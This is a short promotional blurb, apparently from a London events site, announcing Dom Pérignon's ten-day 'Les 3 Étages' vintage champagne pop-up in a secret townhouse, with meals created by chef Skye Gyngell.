Ladies and gents, introducing Les 3 Étages by Dom Pérignon. For ten exclusive days from Tuesday 5th May, Dom Pérignon will take over three floors to showcase some of their finest, fanciest vintage champagnes in a secret central London townhouse location. The first will host their new 2005 Vintage; the second, a 1998 Vintage; and on the third, the rarest 1982 and 1971 Vintages. If that doesn’t sound luxurious enough, Michelin-starred chef Skye Gyngell (founder of Spring and former head chef of Petersham Nurseries) has been brought on board to create a series of tastings, lunch and dinners for the public featuring light summer dishes and fresh, locally sourced ingredients. We’re polishing off our shoes and our diamonds as we speak.
